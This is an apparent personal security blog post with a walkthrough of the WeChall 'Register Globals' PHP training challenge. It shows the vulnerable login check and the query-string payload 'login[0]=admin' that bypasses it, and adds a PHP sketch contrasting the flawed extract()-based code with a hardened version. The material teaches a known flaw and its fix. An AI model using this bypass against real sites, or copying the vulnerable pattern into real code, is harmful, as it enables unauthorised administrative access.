What is it? @.@

This is the place where I record some tactics for wargames, systems, and other security issues.

2012-11-12

WeChall - Training: Register Globals

Description:

PHP - Register Globals

This challenge is a relict of old PHP times, where register globals was enabled by default, which often led to security issues.
Again, your job is to login as admin, and you are given the source code as well as a highlighted version.

Here is the link to the vulnerable script.
I have also set up a test account: test:test

Enjoy!

Solution:
  1. View the source code and find the part of code below.
    ...
    if (isset($login))
    {
            echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
            if (strtolower($login[0]) === 'admin') {
                    $chall->onChallengeSolved(GWF_Session::getUserID());
            }
    }
    
    ...
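  2. Nothing initializes or validates the variable $login before this check, and with register globals enabled a request parameter named login becomes that variable. So we can use a URL like the one below to bypass the login and gain the userlevel of admin.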
    hxxps://www.wechall.net/challenge/training/php/globals/globals.php?username=test&password=test&login[0]=admin
  3. It's done!!
    Register Globals
    Welcome back, admin.
    Your userlevel is .
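
The flaw from step 2 next to a corrected version, as an added example that is not the challenge's source code. register_globals was removed in PHP 5.4, so `extract()` emulates it here; `authenticate()`, its one-account table, the POST-only login and `isAdmin()` are assumptions made for this sketch.

```php
<?php
// Added example, not the challenge's source. extract() emulates register_globals.
// authenticate() is a hypothetical stand-in for the real credential check.
function authenticate(array $post): ?array
{
    $users = ['test' => ['test', 'user']]; // constructed: name => [password, level]
    $u = $post['username'] ?? null;
    $p = $post['password'] ?? null;
    if (is_string($u) && is_string($p) && isset($users[$u]) && hash_equals($users[$u][0], $p)) {
        return [$u, $users[$u][1]];
    }
    return null;
}

// Vulnerable: every query parameter becomes a local variable and $login is
// never initialized, so a "login" parameter reaches the isset() check.
function vulnerable(string $query, array $post = []): ?array
{
    parse_str($query, $get);
    extract($get); // emulates register_globals = On
    $auth = authenticate($post); // assumption: credentials arrive by POST only
    if ($auth !== null) {
        $login = $auth;
    }
    return isset($login) ? (array) $login : null;
}

// Hardened: $login is assigned only by server-side logic; request data stays
// inside its array and never names a variable.
function hardened(string $query, array $post = []): ?array
{
    parse_str($query, $get); // parsed, but never promoted to variables
    return authenticate($post);
}

// Same test as the script: element 0 of $login, case-insensitively, is 'admin'.
function isAdmin(?array $login): bool
{
    return isset($login[0]) && is_string($login[0]) && strtolower($login[0]) === 'admin';
}

$query = 'username=test&password=test&login[0]=admin'; // query string from step 2
foreach (['vulnerable', 'hardened'] as $fn) {
    $login = $fn($query);
    printf("%-10s login=%s admin=%s\n", $fn, json_encode($login), json_encode(isAdmin($login)));
}
$login = hardened($query, ['username' => 'test', 'password' => 'test']);
printf("%-10s login=%s admin=%s\n", 'with POST', json_encode($login), json_encode(isAdmin($login)));
```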
